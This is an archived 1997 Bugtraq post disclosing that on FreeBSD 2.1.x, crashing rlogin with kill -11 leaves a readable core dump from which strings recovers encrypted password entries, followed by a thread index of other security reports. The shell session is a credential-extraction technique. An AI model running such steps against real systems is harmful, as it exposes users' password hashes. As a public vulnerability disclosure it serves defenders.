Bugtraq mailing list archives
FreeBSD,rlogin and coredumps.
From: roelof () CUBE NANOTEQ CO ZA (Roelof W Temmingh)
Date: Mon, 17 Feb 1997 01:34:06 +0200
---------- Forwarded message ---------- If the following is already known, my deepest apologies for the junk mail.. RECONSTRUCT PARTS OF UN-SHADOWED PASSWORDFILE ON (at least) FreeBSD 2.1.0,2.1.5: Bronc Buster wrote:
This exploit is very similer to the FTP exploit on BSD that creates a ftp.core file you can then strings and get the encrypted password file.
....snip...snip.. I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started playing around with dump files: ~> rlogin 127.0.0.1 Password: Last login: Mon Feb 17 00:35:49 from localhost Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996 You have new mail. ~> ps -ax | grep rlogin 6528 ?? S 0:00.06 rlogind 6527 p1 S+ 0:00.05 rlogin 127.0.0.1 6529 p1 S+ 0:00.01 rlogin 127.0.0.1 ~> kill -11 6529~> ls Brain_Box NS cronjobs mail security Mail News foon rlogin.core ~>strings rlogin.core > unshadowed.passwdfile.reconstruct ~>vi unshadowed.passwdfile.reconstruct and reconstruct.. I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I wonder if there is a way to make a core dump only readable by root, and why this isn't the default? ========================================================================= Roelof W Temmingh Network & Data Security Nanoteq rt () nanoteq com [w] South-Africa roelof () cube nanoteq co za [ah] http://www.nanoteq.com =========================================================================
Current thread:
- CIAC Bulletin H-27: HP-UX vgdisplay Buffer Overrun Vulnerability, (continued)
- CIAC Bulletin H-27: HP-UX vgdisplay Buffer Overrun Vulnerability Aleph One (Feb 15)
- screen 3.05.02 Khelbin Sunvold (Feb 15)
- Re: screen 3.05.02 test (Feb 16)
- Bug in apache httpd 1.1.3 Mihai Ibanescu (Feb 16)
- Re: Bug in apache httpd 1.1.3 Dean Gaudet (Feb 16)
- Announce new phf prober release Ray W. Hiltbrand (Feb 17)
- Re: Announce new phf prober release J. Bouvrie (Feb 17)
- NT password dictionary attack. Paul Ashton (Feb 18)
- New CIFS paper up for grabs *Hobbit* (Feb 18)
- Re: screen 3.05.02 Mr. Cyb (Feb 16)
- FreeBSD,rlogin and coredumps. Roelof W Temmingh (Feb 16)
- Re: FreeBSD,rlogin and coredumps. David Greenman (Feb 16)
- Re: FreeBSD,rlogin and coredumps. Adrian Chadd (Feb 17)
- Re: FreeBSD,rlogin and coredumps. Jamshid Abedi (Feb 17)
- Re: FreeBSD,rlogin and coredumps. jamie (Feb 18)
- Re: FreeBSD,rlogin and coredumps. Nathan Torkington (Feb 18)
- Re: FreeBSD,rlogin and coredumps. Daniel O'Callaghan (Feb 18)
- Re: FreeBSD,rlogin and coredumps. Simon Karpen (Feb 18)
- Re: FreeBSD,rlogin and coredumps. Michael Lerperger (Feb 17)
- NetBIOS Auditing Tool Oliver Friedrichs (Feb 16)